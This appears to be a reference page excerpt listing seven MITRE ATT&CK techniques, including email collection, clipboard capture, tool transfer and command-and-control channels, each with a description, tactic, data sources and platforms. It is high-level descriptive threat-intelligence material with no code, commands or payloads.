Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre